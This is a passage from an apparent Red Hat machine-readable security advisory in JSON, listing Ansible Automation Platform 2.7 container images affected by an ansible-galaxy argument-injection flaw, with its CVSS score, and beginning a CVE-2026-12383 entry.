"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ansible-core: argument injection in ansible-galaxy role install leads to arbitrary code execution"
},
{
"acknowledgments": [
{
"names": [
"Chris Meyers"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-12383",
"cwe": {
"id": "CWE-345",
"name": "Insufficient Verification of Data Authenticity"
},
"discovery_date": "2026-06-16T10:09:09.069000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
